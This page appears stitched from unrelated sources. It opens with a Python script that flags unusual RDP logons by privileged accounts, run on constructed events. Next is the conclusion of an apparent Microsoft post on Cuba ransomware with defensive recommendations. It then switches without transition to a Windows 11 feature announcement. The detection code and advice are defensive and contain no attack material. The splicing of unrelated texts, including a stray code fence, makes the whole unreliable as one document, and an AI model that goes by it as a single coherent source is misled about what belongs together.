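"""Added example (not from the Microsoft post): baseline where each privileged
account normally makes RDP (logon type 10) connections from and to, then flag
new connections that hit servers the account has never administered, come
from an unseen source, or originate on an edge server. Logon events and
host names are constructed; field names are assumptions."""
from collections import defaultdict

PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins"}
EDGE_HOSTS = {"EDGE-VPN1", "EDGE-WEB1"}  # constructed list of internet-facing servers
MULTI_NEW_TARGETS = 2  # first-time logons to at least this many servers in one batch


def build_baseline(history):
    """Per privileged account, the set of servers reached and sources used via RDP."""
    base = defaultdict(lambda: {"targets": set(), "sources": set()})
    for ev in history:
        if ev["logon_type"] == 10 and ev["groups"] & PRIVILEGED_GROUPS:
            base[ev["user"]]["targets"].add(ev["target"])
            base[ev["user"]]["sources"].add(ev["source_host"])
    return base


def detect_anomalous_rdp(baseline, batch):
    """Compare a batch of new logon events against the baseline; return findings."""
    findings = []
    new_targets = defaultdict(set)
    for ev in batch:
        if ev["logon_type"] != 10 or not (ev["groups"] & PRIVILEGED_GROUPS):
            continue
        known = baseline.get(ev["user"], {"targets": set(), "sources": set()})
        reasons = []
        first_time = ev["target"] not in known["targets"]
        if first_time:
            reasons.append("first RDP logon by this account to " + ev["target"])
            new_targets[ev["user"]].add(ev["target"])
        if ev["source_host"] not in known["sources"]:
            reasons.append("RDP from unseen source " + ev["source_host"])
        if ev["source_host"] in EDGE_HOSTS:
            reasons.append("RDP originating from edge server " + ev["source_host"])
        if reasons:
            findings.append({"user": ev["user"], "target": ev["target"],
                             "source_host": ev["source_host"],
                             "first_time": first_time, "reasons": reasons})
    # Second pass: note accounts that reached several new servers within the batch.
    for fd in findings:
        count = len(new_targets[fd["user"]])
        if fd["first_time"] and count >= MULTI_NEW_TARGETS:
            fd["reasons"].append(f"account reached {count} servers for the first time in this batch")
    return findings


def _ev(user, source_host, target, *groups):
    """Build a constructed RDP logon record."""
    return {"user": user, "source_host": source_host, "target": target,
            "logon_type": 10, "groups": set(groups)}


HISTORY = [
    _ev("CORP\\alice", "ADMIN-WS1", "SRV-DC1", "Domain Admins"),
    _ev("CORP\\alice", "ADMIN-WS1", "SRV-FILE1", "Domain Admins"),
    _ev("CORP\\alice", "ADMIN-WS1", "SRV-DC1", "Domain Admins"),
]
BATCH = [
    _ev("CORP\\alice", "ADMIN-WS1", "SRV-DC1", "Domain Admins"),   # routine
    _ev("CORP\\alice", "EDGE-VPN1", "SRV-SQL1", "Domain Admins"),  # anomalous
    _ev("CORP\\alice", "EDGE-VPN1", "SRV-APP1", "Domain Admins"),  # anomalous
    _ev("CORP\\bob", "WS-042", "SRV-APP1", "Domain Users"),        # not privileged
]

if __name__ == "__main__":
    for finding in detect_anomalous_rdp(build_baseline(HISTORY), BATCH):
        print(finding)
```

The baseline should be built from a period you have already reviewed; otherwise an attacker's earlier sessions become "normal" for the account.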

Conclusion

Ransomware groups continue to grow in sophistication through increasing hibernation times before encryption, a wide variety of persistent access methods, and the use of legitimately signed binaries. These groups continue to target sensitive data for exfiltration, with some groups returning to the network post-encryption to ensure they maintain a foothold.

Defenders must remain vigilant in hunting for these TTPs and anomalous behaviors. The Cuba ransomware group used a large variety of living-off-the-land techniques to help evade detection by antivirus products. This requires a stronger focus on anomaly and behavioral detections when hunting on a network, rather than standard malicious file detection. Software auditing of remote access tools and remote execution tools, such as PsExec and SSH, should be regularly evaluated.

Microsoft strongly recommends focusing on the following actions to help improve your network’s security posture:

  • Enable tamper protection on antivirus products.
  • Triage high-severity antivirus and EDR alerts, including tampering alerts, in a timely manner.
  • Enable MFA and monitoring for administrator accounts.
  • Monitor anomalies in service and scheduled task creation.

To understand how Microsoft can help you secure your network and respond to network compromise, visit https://aka.ms/DART.


Making the everyday easier with new experiences available in Windows 11

Today, we are excited to announce the availability of new features in Windows 11 along with some exciting new experiences to help you be your most productive and creative, while also having fun. Announced in September, these new features and experiences begin to be available today and are a continuation of our commitment and journey to deliver continuous innovation in Windows to inspire and empower you.

It’s been an energizing few weeks for Windows with the launch of the Windows 11 2022 Update in 190+ countries around the world and our announcement just last week of new Surface devices. At the event, the team enjoyed showing you how Windows 11 comes to life on the new devices enabling you to participate, be seen, heard and express your creativity. If you missed the event, you can watch it here.

Let’s jump into what’s new and available starting today.

File Explorer with Tabs

Tabbed File Explorer1: One of our most loved and highly utilized features, File Explorer, is getting better. Windows is always looking for ways to simplify your everyday tasks and make collaborating as effortless as possible. So, we’re releasing Tabs to File Explorer that let you organize your files and switch between your folders with ease. The new Favorites section is the perfect place to pin your most used files. And thanks to the power of OneDrive we’re making it easier for you to see important information like which of your colleagues most recently edited or commented on your file. When sharing content, Windows can also provide a list of contacts you’re likely to share content with and some personalized suggestions based on your Microsoft 365 account. (Microsoft 365 subscription sold separately)

Suggested Action to create an event from a web page

Suggested Actions1: Another way Windows is making your everyday tasks like collaborating with colleagues more efficient is by anticipating your needs and giving you suggestions for actions you may wish to take. For instance, when there are phone numbers or future dates in text, Windows highlights them, making it easy to click and call with Phone Link, Teams or Skype, or click to schedule an appointment, adding an event in your Calendar app and including the person you were communicating with on your invite.

Taskbar Overflow user interface
Taskbar settings and manager

Taskbar Overflow and easy access to Task Manager: Taskbar is getting two highly requested enhancements. First, if you like to pin a larger selection of apps to your taskbar than space allows, Taskbar gives you an entry point to an overflow menu that allows you to view all your overflowed apps in one space. Second, when you right click on the taskbar, in addition to Taskbar Settings, you will also see an option to jump directly into your Task Manager. These improvements have been made in direct response to your feedback and to give you access to what is important with a single click.

Share to more devices: To make sharing files even easier, we have enhanced the Windows Share experience so that you can simply share files with more discoverable devices nearby directly from your desktop, File Explorer, Photos, Snipping Tool, Xbox and other apps.

Photos app: Coming at the end of October, the Photos app on Windows 11 has been beautifully crafted to make organization of your photo collection easy, no matter where your photos come from — your phone, your camera, OneDrive — see them all together in one gorgeous gallery. We’re also delighted to deliver an exciting new Memories experience which resurfaces pictures you’ve saved on OneDrive, making revisiting life’s magical moments simple and effortless2. Enjoy picture compilations of recent highlights, time spent with loved ones, and more.

We also recently announced that the Photos app can now seamlessly access all the photos on your iPhone with direct connection to your iCloud photo library. Just install iCloud for Windows from the Microsoft Store and the photos you take with your iPhone will appear automatically in your Photos app. iCloud integration will be available in November.

iCloud gallery

Amazon Appstore: Through our partnership with Amazon, you can now access Android™ apps and games from the Amazon Appstore, generally available in 31 countries, including Australia, Canada, France, Germany, Italy, Japan, Spain, United Kingdom, United States and more. With over 50,000 titles to choose from, it’s easy to discover and download your favorite apps and games on your Windows device, such as Project Makeover, Evony: The King’s Return, Coin Master, Kindle, Audible, FlipaClip, Lutron and so many more3. Enabled by Windows Subsystem for Android™, developers now have even more ways to bring their apps and games to Windows – learn more here.

Amazon Appstore

New sports and entertainment apps: For fans everywhere, we are excited to announce that the ESPN app is available in the Microsoft Store globally across 239 markets4. This app joins the growing entertainment catalog, including well-known brands such as Hulu, Netflix, Discord, Vudu, Tubi, Crunchyroll, TikTok, along with Disney+ and Amazon Prime Video for an expanded catalog of titles – making Windows your destination for the entertainment and sports you seek.

ESPN app

We are delighted to deliver on our promise to bring you brand new experiences into Windows 11. These new features and experiences will start to become available today in an optional non-security preview release and a phased rollout via our servicing technology and new apps via Microsoft Store updates5, ensuring you can take advantage of the latest Windows experiences as these new features are ready. The new features will be made broadly available to all editions of Windows 11, version 22H2 in the November 2022 security update release. Going forward we will continue to announce, document and deliver new features and experiences when they are ready (learn more).

If you haven’t moved to Windows 11 yet, now is the time. From Surface to our incredible OEM partners, there is a broad array of choice in Windows 11 PCs to meet your needs. You can learn more here.

Android is a Trademark of Google LLC.

1Timing of feature delivery varies by device. Feature availability may vary by market.

2Access to images stored on OneDrive is contingent on the associated Microsoft Account the device is signed in with.

3Hardware dependent: See Windows 11 Specs and System Requirements | Microsoft.

4Content may not be available in all markets. Blackouts and other restrictions may apply.

5Click ‘Get updates’ in Microsoft Store > Library – and search your favorite titles or explore our new curated collection of mobile apps and games.